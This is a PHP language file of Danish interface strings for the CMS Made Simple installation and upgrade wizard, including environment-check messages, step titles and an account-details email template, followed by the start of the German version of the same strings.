$lang['disable_functions'] = 'Tester for deaktiverede funktioner';
$lang['done'] = 'udført';
$lang['email_accountinfo_message'] = 'Installationen af CMS Made Simple er færdig.

Denne email indeholder følsomme informationer og bør gemmes et sikkert sted.

Her følger diverse oplysninger angående din installion.
Brugernavn: %s
Adgangskode: %s
Installationsmappe: %s
Rodadresse: %s';
$lang['email_accountinfo_message_exp'] = 'Installationen af CMS Made Simple er færdig.

Denne email indeholder følsomme informationer og bør gemmes et sikkert sted.

Her følger diverse oplysninger angående din installion.
Brugernavn: %s
Adgangskode: %s
Installationsmappe: %s';
$lang['email_accountinfo_subject'] = 'Installation af CMS Made Simple udført';
$lang['emailaccountinfo'] = 'Send email med kontooplysninger';
$lang['emailaddr'] = 'Email adresse';
$lang['error_adminacct_emailaddr'] = 'Den indtastede email adresse er ikke gyldig';
$lang['error_adminacct_emailaddrrequired'] = 'Du har angivet, at kontooplysningerne skal sendes pr., email, men den indtastede email adresse er ikke gyldig';
$lang['error_adminacct_password'] = 'Den indtastede adgangskode er ikke gyldig (den skal bestå af mindst seks tegn)';
$lang['error_adminacct_repeatpw'] = 'De to indtastede adgangskoder stemmer ikke overens';
$lang['error_adminacct_username'] = 'Det indtastede brugernavn er ikke gyldigt. Prøv venligst igen';
$lang['error_admindirrenamed'] = 'Det ser ud til at du, af sikkerhedsmæssige hensyn, har omdøbt din CMSMS administratormappe. Du er derfor nødt til at omgøre <a href="http://docs.cmsmadesimple.org/general-information/securing-cmsms#renaming-admin-folder" target="_blank" class="external">denne proces</a>, før du kan fortsætte!<br /><br />Når du har genoprettet oprindeligt navn på og sti til administrationsmappen, bedes du venligst genindlæse denne side.';
$lang['error_backupconfig'] = 'Vi var ikke i stand til at tage en ordentlig backup af konfigurationsfilen';
$lang['error_checksum'] = 'Tjeksummen for den udpakkede fil svarer ikke til den oprindelige';
$lang['error_cmstablesexist'] = 'Det ser ud til, at der allerede findes en installation af CMS i denne database. Indtast venligst informationer vedrørende en anden database. Hvis du godt vil bruge et andet præfiks til tabellerne, kan det være nødvendigt at genstarte installationsprocessen og så anvende den avancerede metode.';
$lang['error_createtable'] = 'Oprettelse af databasetabel stødte ind i problemer... Måske mangler de fornødne tilladelser';
$lang['error_dbconnect'] = 'Vi kunne ikke oprette forbindelse til databasen. Dobbelttjek venligst de oplysninger, som du har angivet';
$lang['error_dirnotvalid'] = 'Mappen %s findes ikke (eller der mangler en skrivetilladelse den)';
$lang['error_droptable'] = 'Sletning af databasetabel stødte ind i problemer... Måske mangler de fornødne tilladelser';
$lang['error_filenotwritable'] = 'Filen %s kunne ikke overskrives (problem med tilladelser)';
$lang['error_internal'] = 'Beklager, et eller andet er gået galt... (intern fejl) (%s)';
$lang['error_invalid_directory'] = 'Det ser ud til, at den mappe, som du har valgt til installationen, er den samme mappe som installalationsfilerne selv bruger';
$lang['error_invalidconfig'] = 'Der er enten en fejl i konfigurationsfilen eller denne fil mangler';
$lang['error_invaliddbpassword'] = 'Adgangskoden til databasen indeholder ugyldige tegn, som det ikke er forsvarligt at gemme';
$lang['error_invalidkey'] = 'Ugyldig medlemsvariabel eller nøgle %s for klassen %s';
$lang['error_invalidparam'] = 'Ugyldig parameter eller værdi for parametren %s';
$lang['error_invalidtimezone'] = 'Den angivne tidszone er ugyldig';
$lang['error_invalidqueryvar'] = 'Den indtastede variabel i forbindelse med forespørgslen indeholder ugyldige tegn. Anvend venligst kun alfanumeriske tegn samt underscore.';
$lang['error_missingconfigvar'] = 'Enten mangler nøglen "%s" eller denne er ugyldig i config.ini filen';
$lang['error_noarchive'] = 'Der er problemer med at finde den pakkede arkivfil... Genstart venligst';
$lang['error_nlsnotfound'] = 'Der er problemer med at finde NLS-filer i arkivfilen';
$lang['error_nodatabases'] = 'Der blev ikke fundet en kompatibel database-ekstension';
$lang['error_nodbhost'] = 'Indtast venligst et gyldigt værtsnavn (eller IP adresse) til databaseforbindelsen';
$lang['error_nodbname'] = 'Indtast venligst navnet på en gyldig database eller vært som specificeret ovenfor';
$lang['error_nodbpass'] = 'Indtast venligst en gyldig adgangskode som godkendelse til databasen';
$lang['error_nodbprefix'] = 'Indtast venligst et gyldigt præfiks til databasens tabeller';
$lang['error_nodbtype'] = 'Vælg venligst en databasetype';
$lang['error_nodbuser'] = 'Indtast venligst et gyldigt brugernavn som godkendelse til databasen';
$lang['error_nodestdir'] = 'Destinationsmappe er ikke angivet';
$lang['error_nositename'] = 'Navnet på hjemmesiden er et obligatorisk parameter. Indtast venligst et passende navn for din hjemmeside.';
$lang['error_notimezone'] = 'Angiv venligst en gyldig tidszone for denne server';
$lang['error_overwrite'] = 'Der er et problem vedrørende tilladelser: %s kan ikke overskrives';
$lang['error_sendingmail'] = 'Fejl under afsendelse af email';
$lang['error_tzlist'] = 'Der er problemer med at finde listen over tidszone-identifikatorer';
$lang['errorlevel_estrict'] = 'Tjekker E_STRICT';
$lang['errorlevel_edeprecated'] = 'Tjek af';
$lang['edeprecated_enabled'] = 'E_DEPRECATED er i anvendelse i PHPs fejlrapporteringssektion. Selvom dette ikke forhindrer CMSMS i at fungere, så kan det resultere i, at der vises advarselsmeddelelser på skærmen - især fra ældre 3. parts moduler';
$lang['estrict_enabled'] = 'E_STRICT er i anvendelse i PHPs fejlrapporteringssektion. Selvom dette ikke forhindrer CMSMS i at fungere, så kan det resultere i, at der vises advarselsmeddelelser på skærmen - især fra ældre 3. parts moduler';
$lang['fail_assets_dir'] = 'Mappen assets findes allerede. Denne applikation skriver muligvis til denne mappe for at rationalisere lokaliseringen af filerne. Du bedes venligst sikre dig, at du har taget backup';
$lang['fail_assets_msg'] = 'Mappen assets findes allerede. Denne applikation skriver muligvis til denne mappe for at rationalisere lokaliseringen af filerne. Du bedes venligst sikre dig, at du har taget backup';
$lang['fail_config_writable'] = 'HTTP-processen kan ikke skrive til filen config.php. Prøv venligst at ændre filens tilladelser til 777 indtil opgraderingsprocessen er gennemført';
$lang['fail_curl_extension'] = 'curl-udvidelsen blev ikke fundet. Selvom dette ikke er af afgørende betydning, så kan det medføre problemer i forhold til trediehåndsmoduler';
$lang['fail_database_support'] = 'Der blev ikke fundet nogen kompatible database drivere';
$lang['fail_file_get_contents'] = 'Funktionen file_get_contents findes enten ikke, eller også er funktionen deaktiveret. CMSMS kan ikke fortsætte (selv installationsprocessen vil sandsynligvis slå fejl)';
$lang['fail_file_uploads'] = 'Fil-upload er deaktiveret. Flere af CMSMS\' funktioner kan ikke fungere i dette miljø';
$lang['fail_func_json'] = 'json-funktionalitet blev ikke fundet';
$lang['fail_func_gzopen'] = 'gzopen-funktionalitet blev ikke fundet';
$lang['fail_func_md5'] = 'md5-funktionalitet blev ikke fundet';
$lang['fail_func_tempnam'] = 'Funktionen tempnam findes ikke. CMSMS kan ikke køre uden denne funktion';
$lang['fail_func_ziparchive'] = 'Funktionen ZipArchive blev ikke fundet. Dette kan medføre begrænset funktionalitet';
$lang['fail_ini_set'] = 'Det ser ikke ud til, at vi kan ændre ini-indstillingerne. Dette kan medføre problemer i forbindelse med trediepartsmoduler (eller ved aktivering af fejlfinding eller debug mode)';
$lang['fail_magic_quotes_runtime'] = 'Det ser ud til, at magic quotes er aktiveret i din konfiguration. Deaktiver det venligst og prøv så igen';
$lang['fail_max_execution_time'] = 'Din indstilling for max execution time er sat til %s, hvilket ikke imødekommer kravet på mindst %s. Vi anbefaler, at du øger værdien til %s eller mere';
$lang['fail_memory_limit'] = 'Hos dig er værdien for memory limit sat til %s, men mindst %s er påkrævet og %s anbefales';
$lang['fail_multibyte_support'] = 'Multibyte-understøttelse er ikke aktiveret i din konfiguration';
$lang['fail_output_buffering'] = 'Output buffering er ikke aktiveret';
$lang['fail_open_basedir'] = 'Open basedir restrictions er aktiveret. CMSMS fungerer kun, hvis dette er deaktiveret';
$lang['fail_php_version'] = 'Den version af PHP som CMSMS har adgang til er af helt afgørende betydning. Der skal som minimum være adgang til version %s, omend vi anbefaler %s eller højere. Du har version %s';
$lang['fail_post_max_size'] = 'Hos dig er værdien for post max size sat til %s, hvilket ikke imødekommer minimumskravet på %s. Værdier på %s eller mere anbefales og sikrer, at værdien overstiger værdien for upload_max_filesize';
$lang['fail_pwd_writable2'] = 'HTTP-processen skal kunne skrive til destinationsmappen (og til alle filer samt mapper derunder) for at kunne installere filerne. Vi mangler skrivetilladelser til (i hvert fald) %s';
$lang['fail_register_globals'] = 'Deaktiver venligst register globals i PHP-konfigurationen';
$lang['fail_remote_url'] = 'Vi stødte på problemer med at oprette forbindelse til remote URL. Dette vil medføre begrænsninger i forhold til visse af CMSMS\' funktioner';
$lang['fail_safe_mode'] = 'CMSMS kan ikke køre ordentligt i et miljø, hvor safe mode er aktiveret. Safe mode er forældet, da mekanismen er behæftet med fejl. Safe mode vil blive fjernet i fremtidige versioner af PHP';
$lang['fail_session_save_path_exists'] = 'Værdien af variablen for session save path er enten ugyldig eller også findes mappen ikke';
$lang['fail_session_save_path_writable'] = 'Der kan ikke skrives til mappen for session save path';
$lang['fail_session_use_cookies'] = 'Det er påkrævet, at PHP er konfigureret til at gemme en session key i en cookie';
$lang['fail_tmpfile'] = 'Systemets tmpfile()-funktion er ude af drift. Vi skal bruge funktionen til at udpakke arkivfiler. Argumentet for TMPDIR url kan gøres tilgængelig for installationen, så der kan specificeres et skrivbart direktorie. Se filen README, som burde være inkluderet i denne mappe';
$lang['fail_tmp_dirs_empty'] = 'CMSMS\'s midlertidige mapper <em>(tmp/cache og tmp/templates_c) findes og de er ikke tomme. Fjern eller tøm dem venligst';
$lang['fail_xml_functions'] = 'XML-udvidelsen blev ikke fundet. Aktiver den venligst i dit PHP-miljø';
$lang['failed'] = 'fejlet';
$lang['file_get_contents'] = 'Undersøger funktionen file_get_contents';
$lang['file_installed'] = '%s installeret';
$lang['file_uploads'] = 'Undersøger om file upload understøttes';
$lang['finished_custom_freshen_msg'] = 'Din installation er nu blevet opfrisket! Kernefilerne er blevet opdateret og der er blevet dannet en ny config-fil. Besøg venligst din hjemmeside for at sikre dig, at alt fungerer, som det skal';
$lang['finished_custom_install_msg'] = 'Færdig! Besøg venligst din hjemmeside og log ind i administrationspanelet';
$lang['finished_custom_upgrade_msg'] = 'Færdig! Besøg venligst dit CMSMS administrationspanel og din hjemmeside for at sikre dig, at alt fungerer, som det skal.<br><strong>Tip:</strong> Det er en god idé at foretage en ny backup nu.';
$lang['finished_freshen_msg'] = 'Din installation er nu blevet opfrisket! Kernefilerne er blevet opdateret og der er blevet dannet en ny config-fil. Du kan nu <a href="%s">besøge din hjemmeside</a> eller logge ind i <a href="%s">CMSMS administrationspanelet</a>.';
$lang['finished_install_msg'] = 'Vi er færdige! Du kan nu <a href="%s">besøge din hjemmeside</a> eller logge ind i <a href="%s">CMSMS administrationspanelet</a>.';
$lang['finished_upgrade_msg'] = 'Det var det! Besøg venligst <a href="%s">din hjemmeside</a> og log ind i <a href="%s">CMSMS administrationspanelset</a> for at tjekke at alt opfører sig, som det skal. Det kan også være, at du skal opgradere nogle tredjepartsmoduler.<br><strong>Tip:</strong> Husk at lave en ny backup, når du har bekræftet, at alt er, som det skal være.';
$lang['freshen'] = 'Genopfriskning eller reparation af installation';
$lang['func_json'] = 'Tjekker funktioner for json indkodning og dekodning';
$lang['func_md5'] = 'Tjekker md5-funktionalitet';
$lang['func_tempnam'] = 'Tjekker tempnam-funktionalitet';
$lang['func_gzopen'] = 'Tjekker gzopen-funktionalitet';
$lang['func_ziparchive'] = 'Tjekker ziparchive-funktionalitet';
$lang['gd_version'] = 'GD-version';
$lang['goback'] = 'Tilbage';
$lang['info_addlanguages'] = 'Vælg hvilke sprog der skal installeres (udover engelsk). <strong>Bemærk:</strong> Ikke alle oversættelser er komplette.';
$lang['info_adminaccount'] = 'Angiv venligst log ind-oplysninger til den første administrator-konto. Kontoen vil have adgang til alle funktioner i CMSMS\' administrationskonsol.';
$lang['info_advanced'] = 'Avanceret installation giver adgang til flere muligheder under installationsproceduren.';
$lang['info_dbinfo'] = 'CMS Made Simple gemmer rigtigt mange data i databasen. Det er derfor helt nødvendigt, at der er forbindelse til en database. Desuden skal den bruger, som du angiver ved log ind have ALL PRIVILEGES på den specificerene database, således at der kan dannes, slettes og rettes i tabeller, indekser og visninger';
$lang['info_errorlevel_edeprecated'] = 'E_DEPRECATED er et flag, som bruges i af PHPs fejlrapportering. Flaget fortæller, at der skal vises advarsler vedrørende kode, som anvender forældede teknikker. Selvom vi forsøger at sikre, at vi ikke længere anvender forældede metoder i kernefilerne, så kan der godt være nogle moduler, hvor dette ikke gælder. Vi anbefaler, at denne indstilling deaktiveres i PHP-konfigurationen';
$lang['info_errorlevel_estrict'] = 'E_STRICT er et flag, som bruges i af PHPs fejlrapportering. Flaget fortæller, at standarderne for strict coding bør respekteres. Selvom kernefilerne i CMSMS forsøger at leve op til E_STRICT-standarderne, så kan der være moduler, hvor dette ikke er tilfældet. Vi anbefaler, at denne indstilling deaktiveres i PHP-konfigurationen';
$lang['info_installcontent'] = 'Hvis intet andet er angivet, vil installationen oprette en række simple sider, typografiark og skabeloner i CMSMS. Det simple indhold indeholder uddybende information samt tips, der kan hjælpe dig med at opbygge hjemmesider i CMSMS - så det er værd at læse. Men hvis du allerede er bekendt med CMS Made Simple, kan muligheden fravælges, hvilket betyder, at der kun oprettes et minimum af skabeloner, typografiark og indholds-sider.';
$lang['info_open_basedir_session_save_path'] = 'open_basedir er aktiveret i din PHP-konfiguration. Vi kunne ikke komme til at teste dueligheden af sessions ordentligt. Men da du er nået hertil i installations-processen, så betyder det sandsynligvis, at sessions fungerer udmærket.';
$lang['info_pwd_writable'] = 'Applikationen skal have skriveadgang til det aktuelle direktorie';
$lang['info_queryvar'] = 'Variablen query bruges internt af CMSMS til at identificere den side, som skal vises. I de fleste tilfælde skulle det ikke være nødvendigt at ændre denne indstilling.';
$lang['info_sitename'] = 'Navnet på hjemmesiden bruges i standard-skabelonerne som en del at titlen. Indtast venligst et navn på hjemmesiden, som er læsbart for mennesker';
$lang['info_timezone'] = 'Information om tidszonen er nødvendig af hensyn til tids-beregninger samt visning af dato og lokkeslæt. Vælg venligst serverens tidszone';
$lang['ini_set'] = 'Tjekker om vi kan ændre indstillinger for INI';
$lang['install'] = 'Installér';
$lang['install_attachstylesheets'] = 'Forbind typografiark med temaer';
$lang['install_backupconfig'] = 'Foretager backup af config-fil';
$lang['install_createassets'] = 'Opret struktur for \'assets\'';
$lang['install_created_index'] = 'Oprettede indekser';
$lang['install_create_tables'] = 'Opret tabeller i databasen';
$lang['install_createconfig'] = 'Dan ny config-fil';
$lang['install_createcontentpages'] = 'Opret standardiserede indholds-sider';
$lang['install_created_table'] = 'Oprettede tabeller';
$lang['install_createtablesindexes'] = 'Opretter tabeller og indekser';
$lang['install_createtmpdirs'] = 'Opret mappe til midlertidige filer';
$lang['install_creating_index'] = 'Oprettede indeks';
$lang['install_default_collections'] = 'Installer standard-samlinger';
$lang['install_defaultcontent'] = 'Installer standardiseret indhold';
$lang['install_detectlanguages'] = 'Find installerede sprog';
$lang['install_dropping_tables'] = 'Sletter tabeller';
$lang['install_dummyindexhtml'] = 'Opret dummy index.html-filer';
$lang['install_extractfiles'] = 'Udpak filer fra arkiv';
$lang['install_initevents'] = 'Opret begivenheder';
$lang['install_initsitegroups'] = 'Opret de første grupper';
$lang['install_initsiteperms'] = 'Sæt de første tilladelser';
$lang['install_initsiteprefs'] = 'Sæt de første præferencer';
$lang['install_initsiteusers'] = 'Opret første brugerkonto';
$lang['install_initsiteusertags'] = 'Første brugerdefinerede tags';
$lang['install_module'] = 'Installerer modul %s';
$lang['install_modules'] = 'Installér tilgængelige moduler';
$lang['install_passwordsalt'] = 'Sæt grundværdi for kryptering af adgangskode';
$lang['install_requireddata'] = 'Sæt første påkrævede data';
$lang['install_schema'] = 'Opret skema';
$lang['install_setschemaver'] = 'Bestem version for skema';
$lang['install_setsequence'] = 'Nulstil \'sequence\'-tabeller';
$lang['install_setsitename'] = 'Sæt hjemmesidenavn';
$lang['install_stylesheets'] = 'Opret standardiserede typografiark';
$lang['install_templates'] = 'Opret standardiserede skabeloner';
$lang['install_templatetypes'] = 'Opret standardiserede skabelontyper';
$lang['install_update_sequences'] = 'Opdatér \'sequence\'-tabeller';
$lang['install_updatehierarchy'] = 'Opdater indholdets plads i hierarki';
$lang['install_updateseq'] = 'Opdatér sekvens';
$lang['installer_ver'] = 'Installations-scriptets versionsnummer';
$lang['legend'] = 'Signaturforklaring';
$lang['magic_quotes_runtime'] = 'Sørg for at magic_quotes er deaktiveret';
$lang['max_execution_time'] = 'Afprøver max execution time for PHP-script';
$lang['meaning'] = 'Betyder at';
$lang['memory_limit'] = 'Tjekker at der er tilstrækkelig PHP memory limit';
$lang['msg_clearedcache'] = 'Nulstillede serverens cache';
$lang['msg_configsaved'] = 'Eksisterende config-fil gemt i %s';
$lang['msg_upgrade_module'] = 'Opgraderer modul';
$lang['msg_upgrademodules'] = 'Opgraderer moduler';
$lang['msg_yourvalue'] = 'Du har: %s';
$lang['multibyte_support'] = 'Tjekker understøttelse af multibyte';
$lang['next'] = 'Næste';
$lang['no'] = 'Nej';
$lang['none'] = 'Ingen';
$lang['open_basedir'] = 'Restriktioner for open_basedir';
$lang['open_basedir_session_save_path'] = 'open_basedir er aktiveret. Kan ikke teste session save path';
$lang['output_buffering'] = 'Sørger for at output buffering er aktiveret';
$lang['pass_config_writable'] = 'HTTP-processen har skriveadgang til config.php-filen';
$lang['pass_database_support'] = 'Mindst en kompatibel database-driver fundet';
$lang['pass_func_json'] = 'json-funktionalitet fundet';
$lang['pass_func_md5'] = 'md5-funktionalitet fundet';
$lang['pass_func_tempnam'] = 'Funktionen tempnam findes';
$lang['pass_multibyte_support'] = 'Understøttelse af multibyte ser ud til at være aktiveret';
$lang['pass_php_version'] = 'Den version af PHP som i øjeblikket er konfigureret lever ikke op til minimumskravene. Der kræves mindst PHP %s, omend vi anbefaler %s eller derover';
$lang['pass_pwd_writable'] = 'HTTP-processen kan skrive i destinationsmappen. Dette er nødvendigt i forhold til udpaking af filer';
$lang['password'] = 'Adgangskode';
$lang['ph_sitename'] = 'Indtast et navn på hjemmesiden';
$lang['php_version'] = 'PHP-version';
$lang['post_max_size'] = 'Tjekker maksimum antal data, der kan sendes i én forespørgsel';
$lang['prompt_addlanguages'] = 'Yderligere sprog';
$lang['prompt_createtables'] = 'Opret database-tabeller';
$lang['prompt_dbhost'] = 'Databasens værtsnavn';
$lang['prompt_dbinfo'] = 'Info om databasen';
$lang['prompt_dbname'] = 'Databasens navn';
$lang['prompt_dbpass'] = 'Adgangskode';
$lang['prompt_dbport'] = 'Portnummer';
$lang['prompt_dbprefix'] = 'Præfiks til tabelnavne i databasen';
$lang['prompt_dbtype'] = 'Databasetype';
$lang['prompt_dbuser'] = 'Brugernavn';
$lang['prompt_dir'] = 'Installationsmappe';
$lang['prompt_installcontent'] = 'Installér simpelt indhold';
$lang['prompt_queryvar'] = 'Forespørgselsvariabel';
$lang['prompt_sitename'] = 'Hjemmesidens navn';
$lang['prompt_timezone'] = 'Serverens tidszone';
$lang['pwd_writable'] = 'Mappe er skrivbar';
$lang['queue_for_upgrade'] = 'Satte modul %s (tilhører ikke kernen) i kø til opdatering i næste trin';
$lang['readme_uc'] = 'LÆS MIG';
$lang['register_globals'] = 'Sørger for at register globals er deaktiveret';
$lang['remote_url'] = 'Tjekker om vi kan oprette udgående HTTP-forbindelser';
$lang['repeatpw'] = 'Gentag adgangskode';
$lang['reset_site_preferences'] = 'Nulstil visse af hjemmesidens præferencer';
$lang['reset_user_settings'] = 'Nulstil bruger-præferencer';
$lang['retry'] = 'Prøv igen';
$lang['safe_mode'] = 'Tester sikring af at safe mode er deaktiveret';
$lang['saltpasswords'] = 'Krypteringsnøgle til adgangskoder';
$lang['select_language'] = 'Som det første vil vi bede dig om at vælge, hvilket sprog du foretrækker i nedenstående liste. Dette anvendes til at forbedre din oplevelse undervejs installationens forskellige trin, men dit sprogvalg har ingen indflydelse på din CMSMS-installation.';
$lang['send_admin_email'] = 'Send en email med administrators log ind-oplysninger';
$lang['session_capabilities'] = 'Tester ordentlig funktionalitet af session (at sessions bruger cookies, at session save path er skrivbar osv)';
$lang['session_save_path_exists'] = 'Findes session_save_path';
$lang['session_save_path_writable'] = 'Der kan skrives til session_save_path';
$lang['session_use_cookies'] = 'Sikrer at PHP-sessions anvender cookies';
$lang['sometests_failed'] = 'Vi har udført en lang række tests af dit nuværende web-miljø. Selvom vi ikke fandt nogen kritiske forhold, så anbefaler vi, at følgende ting rettes, før du fortsætter.';
$lang['step1_advanced'] = 'Avanceret installation';
$lang['step1_destdir'] = 'Vælg mappe';
$lang['step1_info_destdir'] = '<strong>Advarsel:</strong> Dette program kan installere eller opgradere flere installationer af CMS Made Simple. Det er vigtigt, at du vælger den rigtige mappe til installationen eller opgraderingen.';
$lang['step1_language'] = 'Vælg sprog';
$lang['step1_title'] = 'Vælg sprog';
$lang['step2_cmsmsfound'] = 'Der blev fundet en installation af CMS Made Simple. Det er muligt at opgradere denne installation. Dog er det vigtigt, før du fortsætter, at du sikrer dig, at du har en helt opdateret og VERIFICERET backup af alle filer og af databasen';
$lang['step2_cmsmsfoundnoupgrade'] = 'Selvom der blev fundet en installation af CMS Made Simple, så er det ikke muligt at opgradere den med denne applikation. Versionen kan være for gammel.';
$lang['step2_confirminstall'] = 'Er du sikker på, at du gerne vil installere CMS Made Simple?';
$lang['step2_confirmupgrade'] = 'Er du sikker på, at du gerne vil opgradere CMS Made Simple?';
$lang['step2_errorsamever'] = 'Den valgte mappe ser ud til at indeholde en CMSMS-installation med det samme versionsnummer som det, der er inkluderet i dette script. Hvis du fortsætter, vil installationen blive opfrisket.';
$lang['step2_errortoonew'] = 'Den valgte mappe ser ud til at indeholde en CMSMS-installation med et nyere versionsnummer end det, der er inkluderet i dette script. Det er ikke muligt at fortsætte.';
$lang['step2_info_freshen'] = 'Opfriskning af installationen indebærer, at alle kerne-filer erstattes og at konfigurationen gendannes. Du vil blive bedt om grundlæggende informationer vedrørende konfigurationen, men databasen bliver ikke berørt.';
$lang['step2_installdate'] = 'Installationen er foretaget cirka den';
$lang['step2_install_dirnotempty2'] = 'Denne mappe indeholder allerede nogle filer eller undermapper. Selvom det godt kan lade sig gøre at installere CMSMS i mappen, så kan det uforvarende komme til at medføre, at den eksisterende applikation ødelægges. Dobbelttjek venligst indholdet af denne mappe. Af reference-hensyn er nogle af filerne listet nedenfor. Du bedes venligst sikre dig, at dette er korrekt.';
$lang['step2_hdr_upgradeinfo'] = 'Info om versionen';
$lang['step2_info_upgradeinfo'] = 'Nedenfor finder du beskeder vedrørende denne udgivelse samt en liste med information om ændringer for hver udgivelse. Ved klik på knapperne herunder kan du få vist detaljeret information om, hvad der er sket af ændringer i hver version af CMS Made Simple. Der kan være yderligere instrukser eller advarsler i hver version, som kan påvirke opgraderingsprocessen.';
$lang['step2_minupgradever'] = 'Denne applikation kan ikke opgradere versioner, der er ældre end version %s. Det kan være, du er nødt til trinvist at opgradere applikationen til en nyere version ved at benytte dig af en anden metode, før du færdiggøre opgraderingsprocessen. Du bedes venligst først sikre dig, at du har taget en fuldstændig, verificeret backup uanset hvilken opgraderingsmetode, du bruger.';
$lang['step2_nocmsms'] = 'Vi fandt ikke nogen installation af CMS Made Simple i denne mappe. Det ser ud til, at dette er en ny installation';
$lang['step2_nofiles'] = 'Som ønsket vil applikationens kerne-filer ikke blive behandlet under denne proces.';
$lang['step2_passed'] = 'Bestået';
$lang['step2_pwd'] = 'Aktuel mappe';
$lang['step2_schemaver'] = 'Databasens skemaversion';
$lang['step2_version'] = 'Din version';
$lang['step3_failed'] = 'Denne pakke har udført adskillige tests af dit PHP-miljø og en eller flere af disse tests er ikke bestået. Du bliver nødt til at rette disse fejl i din konfiguration, før du kan fortsætte. Når du har rettet fejlene, så klik på "Prøv igen" nedenfor.';
$lang['step3_passed'] = 'Denne pakke har udført adskillige tests af dit PHP-miljø og alle har bestået. Dette er godt nyt! Selvom der ikke er tale om en altomfattende test, så skulle du ikke have nogen problemer med at køre kerneinstallationen af CMSMS.';
$lang['step9_removethis'] = '<strong>Advarsel</strong> Af sikkerhedsmæssige hensyn er det vigtigt, at du fjerner installations-assistenten, så den ikke kan tilgås via browseren så snart, du har verificeret, at operationen er vellykket.';
$lang['symbol'] = 'Symbol';
$lang['social_message'] = 'Det lykkedes mig at installere CMS Made Simple!';
$lang['test_failed'] = 'En påkrævet test mislykkedes';
$lang['test_passed'] = 'En test er bestået <em>(beståede tests vises kun under avanceret installation)</em>';
$lang['test_warning'] = 'En indstilling er højere end den påkrævede værdi, men lavere end den anbefalede værdi, eller...<br>Der kan være nogle valgfrie funktioner, som ikke virker.';
$lang['th_status'] = 'Status';
$lang['th_testname'] = 'Test';
$lang['th_value'] = 'Værdi';
$lang['title_error'] = 'Der er nogen i Houston, som har et problem!';
$lang['title_step2'] = 'Trin 2 - Find eksisterende software';
$lang['title_step3'] = 'Trin 3 - Tests';
$lang['title_step4'] = 'Trin 4 - Info om den basale konfiguration';
$lang['title_step5'] = 'Trin 5 - Information vedrørende administrator-konto';
$lang['title_step6'] = 'Trin 6 - Indstillinger for hjemmesiden';
$lang['title_step7'] = 'Trin 7 - Installering af applikations-filer';
$lang['title_step8'] = 'Trin 8 - Database-opgaver';
$lang['title_step9'] = 'Trin 9 - Færdiggørelse';
$lang['title_welcome'] = 'Velkommen';
$lang['title_forum'] = 'Forum med hjælp og støtte';
$lang['title_docs'] = 'Officiel manual';
$lang['title_api_docs'] = 'Officiel manual til API';
$lang['to'] = 'til';
$lang['title_share'] = 'Del dine erfaringer med dine venner.';
$lang['tmpfile'] = 'Tjekker om tmpfile() virker';
$lang['tmp_dirs_empty'] = 'Du bedes sikre dig, at temporære mapper enten er tomme eller ikke findes';
$lang['upgrade'] = 'Opgradér';
$lang['upgrade_deleteoldevents'] = 'Sletter gamle hændelser';
$lang['upgrading_schema'] = 'Opdaterer skema';
$lang['upload_max_filesize'] = 'Tjekker maksimumstørrelse for uploadede filer';
$lang['username'] = 'Brugernavn';
$lang['warn_disable_functions'] = 'Bemærk: En eller flere af de inderste dele af PHP\'s funktioner er deaktiveret. Dette kan have negativ betydning for din CMSMS-installation - særligt når det gælder tredjepartsudvidelser. Hold venligst øje med din fejl-log. De deaktiverede funktioner er:<br><br> %s';
$lang['warn_max_execution_time'] = 'Selvom du har en indstilling for max execution time på %s, som imødekommer eller overstiger minimumværdien på %s, så anbefaler vi, at du øger den til %s eller højere';
$lang['warn_memory_limit'] = 'Din indstilling for memory limit på %s ligger over minimumsværdien på %s. Vi anbefaler imidlertid værdien %s';
$lang['warn_open_basedir'] = 'I din PHP-konfiguration er open_basedir aktiveret. Selvom du godt kan fortsætte, så vil CMSMS ikke kunne understøtte installationer, når der findes open_basedir-restriktioner.';
$lang['warn_post_max_size'] = 'Hos dig er værdien for post max size sat til %s, hvilket ligger over mindstekravet på %s. Dog vil vi anbefale %s. Du bedes endvidere sikre dig, at denne værdi er højere end værdien for upload_max_filesize';
$lang['warn_tests'] = '<strong>Bemærk:</strong> alle disse tests er bestået, hvilket skulle sikre, at CMSMS fungerer, som det skal for de fleste hjemmesider. Men i takt med at dit site vokser og der tilføjes flere og flere funktioner, kan disse minimumsværdier blive utilstrækkelige. I øvrigt kan tredjeparts moduler stille yderligere krav, hvis de skal fungere efter hensigten';
$lang['warn_upload_max_filesize'] = 'Selvom indstillingen på %s er tilstrækkelig, så anbefaler vi, at du øger værdien af upload_max_filesize til mindst %s i PHP';
$lang['welcome_message'] = 'Velkommen til! Dette er CMS Made Simples automatiske installationsmekanisme. Denne pakke giver dig både mulighed for nemt og hurtigt at få bekræftet, at dit webhotel er foreneligt med CMSMS, og at installere eller opgradere til den nyeste version af CMS Made Simple.<br>Vi ved, at du vil få glæde af det.';
$lang['wizard_step1'] = 'Velkommen';
$lang['wizard_step2'] = 'Find eksisterende software';
$lang['wizard_step3'] = 'Afprøvning af kompatibilitet';
$lang['wizard_step4'] = 'Info om konfiguration';
$lang['wizard_step5'] = 'Info om administrator-konto';
$lang['wizard_step6'] = 'Indstillinger for hjemmeside';
$lang['wizard_step7'] = 'Filer';
$lang['wizard_step8'] = 'Database-opgaver';
$lang['wizard_step9'] = 'Færdiggørelse';
$lang['xml_functions'] = 'Tjekker XML-funktionalitet';
$lang['yes'] = 'Ja';
?><?php
$lang['advanced_mode'] = 'Erweiterten Modus aktivieren';
$lang['apptitle'] = 'Installations- und Aktualisierungsassistent';
$lang['available_languages'] = 'Verfügbare Sprachen';
$lang['changelog_uc'] = 'Versionshistorie';
$lang['config_writable'] = 'Suche nach beschreibbarer Konfigurationsdatei';
$lang['confirm_upgrade'] = 'Soll die Aktualisierung begonnen werden?';
$lang['curl_extension'] = 'Prüfe auf cURL-Erweiterung';
$lang['database_support'] = 'Prüfe auf kompatible Datenbanktreiber';
$lang['desc_wizard_step1'] = 'Beginn der Installation/Aktualisierung';
$lang['desc_wizard_step2'] = 'Analyse des Zielverzeichnisses, um eventuell existierende Software zu finden';
$lang['desc_wizard_step3'] = 'Prüfung, um sicherzustellen, dass alles in Ordnung ist, um die CMS-Made-Simple-Grundinstallation vorzunehmen';
$lang['desc_wizard_step5'] = 'Für Neuinstallationen bitte Daten für das Administratorkonto angeben';
$lang['desc_wizard_step6'] = 'Für Neuinstallationen bitte einige grundlegende Seitendetails angeben';
$lang['desc_wizard_step7'] = 'Dateien entpacken';
$lang['destination_directory'] = 'Zielverzeichnis';
$lang['dest_writable'] = 'Schreibberechtigung im Zielverzeichnis';
$lang['disable_functions'] = 'Deaktivierte Funktionen';
$lang['done'] = 'erledigt';
